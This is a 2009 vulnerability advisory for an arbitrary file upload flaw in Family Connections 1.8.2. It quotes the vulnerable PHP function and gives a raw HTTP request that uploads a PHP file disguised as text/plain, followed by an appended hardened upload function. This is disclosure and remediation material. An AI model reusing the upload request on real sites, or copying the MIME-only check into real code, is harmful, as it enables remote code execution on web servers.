Family Connections 1.8.2 Arbitrary File Upload


*******   Salvatore "drosophila" Fresta   *******

[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com 

[+] Bugs: [A] Arbitrary File Upload

[+] Exploitation: Remote
[+] Date: 3 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Arbitrary File Upload

[-] Files affected: documents.php, inc/documents_class.php

This bug allows a registered user to upload arbitrary
files to the system. This is possible because there
is no check on the file extension; the only check is
on the Content-Type header sent by the client, which
can be changed easily.

...

if (isset($_POST['submitadd'])) {
    $doc = $_FILES['doc']['name'];
    $desc = addslashes($_POST['desc']);
    if ($docs->uploadDocument($_FILES['doc']['type'],
            $_FILES['doc']['name'], $_FILES['doc']['tmp_name'])) {

...

function uploadDocument ($filetype, $filename, $filetmpname) {
    global $LANG;
    $known_photo_types = array(
        'application/msword' => 'doc', 'text/plain' => 'txt',
        'application/excel' => 'xsl', 'application/vnd.ms-excel' => 'xsl',
        'application/x-msexcel' => 'xsl',
        'application/x-compressed' => 'zip', 'application/x-zip-compressed' => 'zip',
        'application/zip' => 'zip', 'multipart/x-zip' => 'zip',
        'application/rtf' => 'rtf', 'application/x-rtf' => 'rtf',
        'text/richtext' => 'rtf',
        'application/mspowerpoint' => 'ppt', 'application/powerpoint' => 'ppt',
        'application/vnd.ms-powerpoint' => 'ppt', 'application/x-mspowerpoint' => 'ppt',
        'application/x-excel' => 'xsl', 'application/pdf' => 'pdf');
    if (!array_key_exists($filetype, $known_photo_types)) {
        echo "<p class=\"error-alert\">".$LANG['err_not_doc1']." $filetype ".$LANG['err_not_doc2']."<br/>".$LANG['err_not_doc3']."</p>";
        return false;
    } else {
        copy($filetmpname, "gallery/documents/$filename");
        return true;
    }
}

...


*************************************************

[+] Code


- [A] Arbitrary File Upload

The following is an example of a malicious package:

POST /fcms/upload.php HTTP/1.1\r\n
Host: localhost\r\n
Cookie: PHPSESSID=50fb1135c2da7f60bb66eb35cbc6ab97\r\n
Content-type: multipart/form-data, boundary=AaB03x\r\n
Content-Length: 295\r\n\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="doc"; filename="file.php"\r\n
Content-Type: text/plain\r\n
\r\n
<?php echo "This is not a text file"?>\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="desc"\r\n
\r\n
description\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="submitadd"\r\n
\r\n
Submit\r\n
--AaB03x--\r\n


*************************************************

[+] Fix

No fix.


*************************************************

--
Salvatore "drosophila" Fresta
CWNP444351
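The "[+] Fix" section above reports no fix. The following hardened version of uploadDocument() was written for this advisory as an illustration (example code, not Family Connections' own) and shows the checks the vulnerable function lacks: a server-side extension allowlist, a libmagic cross-check instead of trusting $_FILES['doc']['type'], and a server-generated stored name. The uploadDocumentSafe() name and the list of MIME strings libmagic reports are assumptions.

```php
<?php
// Hardened replacement for uploadDocument(), written for this advisory as an
// illustration; it is not Family Connections code. It keeps the advisory's
// $_FILES['doc'] input and gallery/documents/ target. The MIME strings below
// are an assumption about what libmagic reports for these formats.

// Extensions the document gallery accepts, decided on the server side.
const ALLOWED_EXTENSIONS = ['doc', 'txt', 'xls', 'zip', 'rtf', 'ppt', 'pdf'];

// Types finfo may report for those formats (OLE2 Office files usually show up
// as application/msword, application/vnd.ms-office or application/CDFV2).
const ALLOWED_DETECTED_TYPES = [
    'application/msword', 'application/vnd.ms-excel',
    'application/vnd.ms-powerpoint', 'application/vnd.ms-office',
    'application/CDFV2', 'text/plain', 'application/zip',
    'application/rtf', 'text/rtf', 'application/pdf',
];

function uploadDocumentSafe(array $file, string $targetDir): ?string
{
    // Only accept a file that PHP itself received through a multipart upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
            || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // The extension comes from the name, never from the client-set 'type';
    // the advisory's "file.php" is rejected here.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return null;
    }
    // Second opinion from the bytes actually uploaded: libmagic typically
    // reports a body starting with "<?php" as text/x-php, not text/plain.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($detected, ALLOWED_DETECTED_TYPES, true)) {
        return null;
    }
    // Store under a server-generated name: the user-chosen filename never
    // touches the filesystem, and the extension is the one validated above.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($targetDir, '/') . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);
    return $stored;
}
```

Call it as uploadDocumentSafe($_FILES['doc'], 'gallery/documents') from the submitadd handler; the upload directory itself should also be configured so the web server never executes scripts stored in it.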
